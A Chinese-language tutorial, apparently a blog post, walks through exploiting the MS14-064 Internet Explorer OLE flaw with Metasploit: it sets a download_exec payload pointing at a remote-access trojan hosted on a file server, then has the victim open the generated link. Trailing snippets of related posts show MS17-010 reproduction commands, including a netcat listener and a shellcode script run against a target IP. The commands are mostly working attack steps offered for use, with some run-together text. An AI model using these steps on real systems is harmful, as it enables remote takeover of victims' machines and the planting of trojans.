ms14_064漏洞別ie開啟鏈結執行遠控木馬
漏洞危及版本:
win7/ xp
1生成遠控小馬詳見「ngrok配合msf生成木馬」
2.將木馬上傳至hsf檔案伺服器複製鏈結
3.開啟metasploit
root@kali:~#msfconsole
msf> useexploit/windows/browser/ms14_064_ole_code_execution
msfexploit(ms14_064_ole_code_execution) > set allowpowershellprompttrue
msfexploit(ms14_064_ole_code_execution) >set srvhost
(本機ip)
msfexploit(ms14_064_ole_code_execution) >set payloadwindows/download_exec
msfexploit(ms14_064_ole_code_execution) >set url
(hsf檔案伺服器木馬url)
msf exploit(ms14_064_ole_code_execution)>exploit
4.複製msf生成的url在目標中開啟
MS14 064 漏洞測試入侵win7
microsoft windows ole遠端 執行漏洞,ole 物件鏈結與嵌入 是一種允許應用程式共享資料和功能的技術,遠端攻擊者利用此漏洞通過構造的 執行任意 影響win95 ie3 win10 ie11全版本.metasploit裡已經加入了此漏洞的利用模組 exploit windows b...
ms17 010漏洞復現
很老的洞了,只是老師上課講了,我就復現一遍。環境靶機為windows7並且存在此漏洞 攻擊機需要python3環境 nc lvp 8888 python ms17 010.py host 192.168.217.2 file shellcode 只需這兩條命令,便可以利用成功,其中ms17 010....
MS17 010漏洞復現
實驗環境 kali 虛擬機器 windows 7 x64 虛擬機器 1 檢視兩台機器的ip位址,且關閉win7防火牆 可見win7 ip為 192.168.15.129 kali 為 192.168.15.130 啟動 mdfconsole msfconsole 使用如下命令 第一句為利用auxil...